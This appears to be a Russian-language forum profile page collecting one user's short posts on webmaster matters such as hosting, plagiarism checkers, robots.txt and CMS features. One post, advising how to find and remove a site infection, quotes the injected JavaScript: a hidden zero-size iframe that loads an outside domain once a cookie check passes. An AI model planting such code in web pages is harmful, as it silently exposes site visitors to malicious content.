Alex05

Рейтинг
31
Регистрация
08.12.2011

Поведенческий анализ - js-файлы шурши. Причем ищи по дате изменения (- пару дней от обнаружения вируса). Думаю, и самому по силам решить проблему.

tzara:
только адвего плагиатус-давно устраивает.

Видать, не всех)

Илья1981:
Нормальный вроде хостинг. Пользуюсь 2 месяца. Единственное, пока не понравилось то, что бы сменить тариф, надо тикет создавать.

Аналогично. Юзаю бегет несколько месяцев и всем доволен.

deni001:
Подскажите вылетела из индекса главная страница (только главная) начали разбираться - нашли запись в рототсе Disallow: /*index.php$ предположили что запись не верная - удалили, но вопрос остался - возможно ли что она и была причиной
... строчку удалили, написали в Я.вебмастер - ответ: " Ранее при обращении к Вашему сайту наш робот получал ответ 403, поэтому главная страница была исключена из поиска. Сейчас ошибки не возникает, робот получает ответ 200 ..." так что выходит что проблема была в этом ...😕

Так Вы же сами и ответили на свой вопрос.

XPresident:
Вы не поверите, но я уверен в том, что пишу интересно, правильно и профессионально, а также обязательно сообщаю об этом каждому заказчику=)

Вряд ли найдется специалист, считающий по-другому. Ведь объективное мнение - мнение со стороны, а не личное.

Ищите js-файлы, измененные в то время, как появился вредоносный код. Там и найдете строки по типу

var ifnl9Jkc = document.createElement('iframe');ifnl9Jkc.name = 'ifnl9Jkc';ifnl9Jkc.src = 'http://loimret.55l55.com/';ifnl9Jkc.style.width = '0px';ifnl9Jkc.style.height = '0px';window.onload = function() {document.cookie = 'chcook=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT'; if ((document.cookie.indexOf('ifnl9Jkc=') == -1) && (document.cookie.indexOf('chcook=') != -1)) { document.getElementsByTagName('body')***91;0***93;.appendChild(ifnl9Jkc);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); setTimeout(function() { document.cookie = 'ifnl9Jkc=yes; path=/; expires=' + expiresDate; }, 5000);}};

Ну и сносите его))

Dantomo:
Я рекомендую сортировать файлы по дате модификации и смотреть те, которые были модифицированы во время заражения.

Именно так и палятся модифицированный файлы. Если вердикт: поведенческий фактор, то ищем, как правило, js-файлы, измененные в то время, когда на сайте и появился вирус.

Есть случаи когда адвего пропускал текст как уник, а на том же etxt текст отображался, как архив, размещенный в интернете (правда, и Я, и Г также дают информацию о том, что 100% уникальность). Я к тому, что даже глубокая проверка может пропустить некоторые нюансы.

Проблемы не наблюдаю... В ИЕ, правда, шрифты меняются при наведение (не красиво), с верхним меню - все норм (несколько раз проверял).

Практически на любой cms можно реализовать любые фишки. Так что если хорошо разбираетесь в WP, то за чем стоит дело?!

Всего: 283